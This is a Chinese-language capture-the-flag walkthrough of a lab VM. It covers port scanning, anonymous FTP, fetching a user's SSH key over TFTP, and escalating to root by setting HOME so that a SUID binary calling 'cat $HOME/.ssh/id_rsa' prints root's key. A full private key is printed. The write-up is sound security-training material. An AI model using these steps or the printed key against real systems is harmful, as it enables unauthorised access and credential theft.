信息搜集 1 2 3 4 5 6 7 8 ┌──(root㉿kali)-[~/Desktop/tmp] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.31.1 a4:a9:30:df:ef:44 (Unknown) 192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered) 192.168.31.116 08:00:27:26:b1:6f PCS Systemtechnik GmbH 192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
ip为192.168.31.116,nmap扫描端口
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.116 --min-rate=1000 -p- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:29 EST Nmap scan report for hommie (192.168.31.116) Host is up (0.00041s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
80端口 1 2 3 4 5 ┌──(root㉿kali)-[~/Desktop/tmp] └─# curl 192.168.31.116 alexia, Your id_rsa is exposed, please move it!!!!! Im fighting regarding reverse shells! -nobody
80端口目录也扫描不到,只给了一个提示,alexia的id_rsa泄露了,去看21端口
21端口 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ┌──(root㉿kali)-[~/Desktop/tmp] └─# ftp anonymous@192.168.31.116 Connected to 192.168.31.116. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||35772|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 0 Sep 30 2020 index.html 226 Directory send OK. ftp> ls -al 229 Entering Extended Passive Mode (|||35347|) 150 Here comes the directory listing. drwxr-xr-x 3 0 113 4096 Sep 30 2020 . drwxr-xr-x 3 0 113 4096 Sep 30 2020 .. drwxrwxr-x 2 0 113 4096 Jan 23 06:12 .web -rw-r--r-- 1 0 0 0 Sep 30 2020 index.html 226 Directory send OK. ftp> cd .web 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||27864|) 150 Here comes the directory listing. -rw-r--r-- 1 106 113 35 Jan 23 06:12 1.phtml -rw-r--r-- 1 0 0 99 Sep 30 2020 index.html -rw-r--r-- 1 106 113 5493 Jan 23 06:09 rev.php 226 Directory send OK.
21端口有匿名登录,存在.web目录,可以往80端口传文件,但是不解析php,只能放弃
tftp 扫描udp端口
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ┌──(root㉿kali)-[~/Desktop/tmp] └─# nmap 192.168.31.116 --min-rate=1000 -sU --top-ports 20 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:34 EST Nmap scan report for hommie (192.168.31.116) Host is up (0.00053s latency). PORT STATE SERVICE 53/udp closed domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp closed msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp closed snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp closed syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds
tftp的服务开着,结合80端口给的提示
1 2 3 ┌──(root㉿kali)-[~/Desktop/tmp] └─# tftp 192.168.31.116 tftp> get id_rsa
可以下载下来alexia的id_rsa
ssh登录
提权 找有suid的命令
1 2 3 4 5 6 7 8 9 10 11 12 13 alexia@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null /opt/showMetheKey /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/gpasswd /usr/bin/chfn /usr/bin/su /usr/bin/mount /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/umount
/opt/showMetheKey很可疑啊,运行一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 alexia@MiWiFi-RA71-srv:~$ /opt/showMetheKey -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7 V0zdgZSRFhMxx0/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z/lIqUNdHJbgLDyaY26G0y Rn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT gCnBh1Wb4m4e14yF+Syn4wQVh1u/53XGmeB/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j QMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq kyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI M2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM dgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE/KJYS5BQRkIw6qLmVLWRqI0eZW rH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7/ndcaZ4H8KVx0B tIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku/NHAYDMK5T d/rSolVOnrmnMV/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi/ +suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE Ua47n1yGWSWMVaZ55ob3N/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy/2w pmlMTtfdUo7JfEKbZmsz3auih2/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk WeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE/Jz bu4XlJXVeD10ooFofrsZd/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu 3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6 0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14/i5ti7r9z HlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7/wK7XHTwtQZ7cCQTVqbbs y6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h/MStsQYtY OZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08 QPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp ivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV/wN 0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg== -----END OPENSSH PRIVATE KEY-----
把alexia的id_rsa输出了,将这个二进制文件拖下来放进ida看看
1 2 3 4 5 6 7 int __fastcall main(int argc, const char **argv, const char **envp) { setuid(0); setgid(0); system("cat $HOME/.ssh/id_rsa"); return 0;
他是查看环境变量里HOME变量下的.ssh/id_rsa,可以修改HOME变量读取root的id_rsa
1 2 3 4 5 6 7 alexia@MiWiFi-RA71-srv:~$ export HOME=/root alexia@MiWiFi-RA71-srv:/home/alexia$ env SHELL=/bin/bash PWD=/home/alexia LOGNAME=alexia XDG_SESSION_TYPE=tty HOME=/root
再次运行拿到root的id_rsa,登录即可